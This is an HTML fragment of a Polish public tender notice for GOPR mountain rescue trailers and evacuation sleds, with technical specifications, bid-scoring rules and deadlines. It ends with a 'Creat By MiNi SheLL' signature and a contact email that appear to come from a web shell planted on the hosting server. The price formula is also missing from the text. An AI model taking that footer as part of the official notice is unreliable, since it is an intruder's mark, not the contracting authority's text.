estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III zamówienia obejmuje zadanie pod nazwą: <br/><br/>„Dostawa (3) trzech PRZYCZEP TRANSPORTOWYCH DLA GK GOPR” <br/>o następujących parametrach technicznych: <br/><br/>1.	Przyczepa niehamowana do 750 kg DMC<br/>2.	Wymiary przestrzeni ładunkowej:<br/>(szerokość: min. 173cm max183cm, długość: min. 347 max 360cm)<br/>3.	Oś przyczepy przykręcana do środnika podłużnicy<br/>4.	Nośność osi niehamowanej: min. 1350 kg<br/>5.	Konstrukcja cynkowana ogniowo<br/>6.	Podłużnice wykonane z blachy giętej konstrukcyjnej S235 lub innej o tożsamej lub większej wytrzymałości<br/>7.	Grubość blachy, z której wykonana jest podłużnica: min. 3mm<br/>8.	Liczba gięć wzmacniających wytrzymałość podłużnicy: min. 5<br/>9.	Dyszel trapezowy dwukrotnie gięty o przekroju C nieotorowany poza otworami montażowymi<br/>10.	Podłoga płaska z pełnej sklejki wodoodpornej<br/>11.	Przyczepa wyposażona w trap uchylny o wysokości zabudowy ze wspomaganiem siłownikami gazowymi<br/>12.	Trap wyposażony w 4 uchwyty oczkowe zamocowania ładunku, umożliwiające zamocowanie do niego przyczepy ratowniczej lub sań<br/>13.	Reling przedni oporowy o wysokości 25-30cm<br/>14.	3 szt. stopnic zewnętrznych przykręcanych do podłużnic, 2 szt. od przodu koła (po lewej i prawej) i 1 szt. od tyłu koła (po lewej)<br/>15.	Uchwyt wraz z kołem zapasowym (takim samym jak koła zamocowane do osi) mocowany do boku przyczepy<br/>16.	Półka na nosze kubełkowe nie będąca w kolizji z transportowanym quadem lub skuterem śnieżnym<br/>17.	Kliny pod koła mocowane na zewnątrz przyczepy<br/>18.	Koła z boku przestrzeni ładunkowej<br/>19.	Stelaż demontowalny z podziałem na strefę przednią o długości 2.5m i tylną 1m<br/>20.	Plandeka otwierana z każdego boku i od przodu, od góry w strefie tylnej oraz na tylnej ścianie dzielącej strefy ładunkowe<br/>21.	Wysokość przestrzeni ładunkowej: 180cm<br/>22.	Koła: 185R14C, opony wielosezonowe<br/>23.	Uchwyty podłogowe – cybanty 8 szt. nie zajmujące przestrzeni ładunkowej<br/>24.	Wytrzymałe koło manewrowe<br/>25.	Koło zapasowe 1 szt.<br/>26.	Plandeka kolor jasno- szary<br/>27.	Poprzeczki gięte o przekroju w kształcie OMEGA<br/>28.	Zamki burtowe ze sprężynami<br/>29.	Min. 3 lata gwarancji na elementy konstrukcyjne i 2 lata na eksploatacyjne, w tym opony i osie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34000000-7 - Sprzęt transportowy i produkty pomocnicze dla transportu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór najkorzystniejszej oferty zostanie dokonany w oparciu o następujące kryteria:<br/><br/>Dla części I, II, III, IV zamówienia:<br/><br/>1. cena brutto przedmiotu zamówienia – waga 60 %<br/><br/>Oferta z najniższą ceną spośród ofert nieodrzuconych otrzyma 60 punktów. Pozostałe proporcjonalnie mniej, według formuły:<br/><br/> Pc <br/><br/>Pc – ilość punktów ofert badanej w kryterium cena,<br/>ano – najniższa cena brutto ze wszystkich ważnych ofert,<br/>ank – cena brutto badanej oferty,<br/><br/>2. Termin wykonania zamówienia – waga 40%<br/><br/>Termin wykonania zamówienia (Pt) – waga 40%<br/><br/>Punkty za kryterium „termin wykonania zamówienia” zostanie przyznane w skali punktowej do 40 punktów. Ilość punktów w tym kryterium przyznana zostanie według poniższej formuły:<br/><br/>Zamawiający wymaga wykonanie części I, II, III, IV zamówienia w terminie do dnia 30.11.2023 r. od dnia zawarcia umowy.<br/>Wykonawcy otrzymają dodatkowe punkty w tym kryterium oceny ofert w przypadku zaoferowania krótszego terminu wykonania zamówienia tj.:<br/>Wykonanie zamówienia w terminie do dnia 24.11.2023 r. od dnia zawarcia umowy – 20,00 pkt;<br/>Wykonanie zamówienia w terminie do 10.11.2023 r. od dnia zawarcia umowy – 40,00 pkt;<br/><br/>Oferta o terminie wykonania zamówienia krótszym niż do dnia 10.11.2023 r. od dnia zawarcia umowy otrzyma 40,00 pkt<br/><br/>3. Łączna liczba punktów badanej oferty będzie liczona według poniższego wzoru:<br/><br/>P = Pc+ Pt<br/><br/>P- łączna ilość punktów badanej oferty<br/>Pc – ilość punktów badanej oferty w kryterium oceny &#34;cena&#34;<br/>Pt – ilość punktów badanej oferty w kryterium oceny &#34;termin wykonania zamówienia&#34;</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część IV zamówienia obejmuje zadanie pod nazwą: <br/><br/>„Dostawa (3) trzech ŚRODKÓW EWAKUACJI - DLA GK GOPR<br/>o następujących parametrach technicznych: <br/><br/>•	Środek ewakuacji o długości 220 cm i szerokości 58 cm<br/>•	Stabilizujący kadłub z ochronną osłoną głowy zapewnia bezpieczny i wygodny transport. Kadłub z poliestru wzmocnionego włóknem szklanym.<br/>•	Zewnętrzne i wewnętrzne paski sznurujące do zabezpieczenia pacjenta.<br/>•	Pokrowiec z kordury chroniący pacjenta przed warunkami pogodowymi i wiatrem. Pokrowiec ma być wyposażony okienko, dwukierunkowy zamek błyskawiczny, całkowicie zdejmowany.<br/>•	Wyposażony w dwa składane dyszle z możliwością demontażu.<br/>•	Wyposażone w dodatkowy zaczep do skutera śnieżnego<br/>•	Okres gwarancji min. 24 miesiące. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">35113000-9 - Sprzęt bezpieczeństwa</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór najkorzystniejszej oferty zostanie dokonany w oparciu o następujące kryteria:<br/><br/>Dla części I, II, III, IV zamówienia:<br/><br/>1. cena brutto przedmiotu zamówienia – waga 60 %<br/><br/>Oferta z najniższą ceną spośród ofert nieodrzuconych otrzyma 60 punktów. Pozostałe proporcjonalnie mniej, według formuły:<br/><br/> Pc <br/><br/>Pc – ilość punktów ofert badanej w kryterium cena,<br/>ano – najniższa cena brutto ze wszystkich ważnych ofert,<br/>ank – cena brutto badanej oferty,<br/><br/>2. Termin wykonania zamówienia – waga 40%<br/><br/>Termin wykonania zamówienia (Pt) – waga 40%<br/><br/>Punkty za kryterium „termin wykonania zamówienia” zostanie przyznane w skali punktowej do 40 punktów. Ilość punktów w tym kryterium przyznana zostanie według poniższej formuły:<br/><br/>Zamawiający wymaga wykonanie części I, II, III, IV zamówienia w terminie do dnia 30.11.2023 r. od dnia zawarcia umowy.<br/>Wykonawcy otrzymają dodatkowe punkty w tym kryterium oceny ofert w przypadku zaoferowania krótszego terminu wykonania zamówienia tj.:<br/>Wykonanie zamówienia w terminie do dnia 24.11.2023 r. od dnia zawarcia umowy – 20,00 pkt;<br/>Wykonanie zamówienia w terminie do 10.11.2023 r. od dnia zawarcia umowy – 40,00 pkt;<br/><br/>Oferta o terminie wykonania zamówienia krótszym niż do dnia 10.11.2023 r. od dnia zawarcia umowy otrzyma 40,00 pkt<br/><br/>3. Łączna liczba punktów badanej oferty będzie liczona według poniższego wzoru:<br/><br/>P = Pc+ Pt<br/><br/>P- łączna ilość punktów badanej oferty<br/>Pc – ilość punktów badanej oferty w kryterium oceny &#34;cena&#34;<br/>Pt – ilość punktów badanej oferty w kryterium oceny &#34;termin wykonania zamówienia&#34;</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 o ochronie konkurencji i konsumentów ( Dz. U. z 2021.275 ), z innym wykonawcą, który złożył ofertę w postępowaniu albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (wzór oświadczenia stanowi załącznik nr 6 do SWZ)<br/>b)	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Przed zawarciem umowy w sprawie zamówienia publicznego, wykonawca, którego oferta została uznana za najkorzystniejszą zobowiązany jest dopełnić następujących formalności:<br/>1)	przedłożyć zamawiającemu: <br/>	a) umowę konsorcjum, jeżeli zamówienie będzie realizowane przez wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/> b) umowę spółki cywilnej w przypadku, gdy zamówienie realizowane będzie przez wykonawców będących wspólnikami spółki cywilnej, którzy zgodnie z art. 17 ustawy z dnia 6 marca 2018 r. Prawo przedsiębiorców (tekst jedn. Dz.U. 2019 poz. 1292 z późn. zm.) podlegają wpisowi do ewidencji działalności gospodarczej; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi<br/>wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres<br/>umocowania;<br/>3) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanie umowy;<br/>4) wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera),<br/>upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla<br/>wszystkich partnerów;<br/>5) zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od<br/>wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej <br/> oferty w zakresie uregulowanym w art. 454 - 455 Pzp. <br/><br/>2. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy <br/> pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Po wybraniu przycisku „Złóż ofertę” system prezentuje okno składania oferty umożliwiające przekazanie dokumentów elektronicznych, w którym znajdują się dwa pola „przeciągnij” i „upuść” służące do dodawania plików.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-21 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-20</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com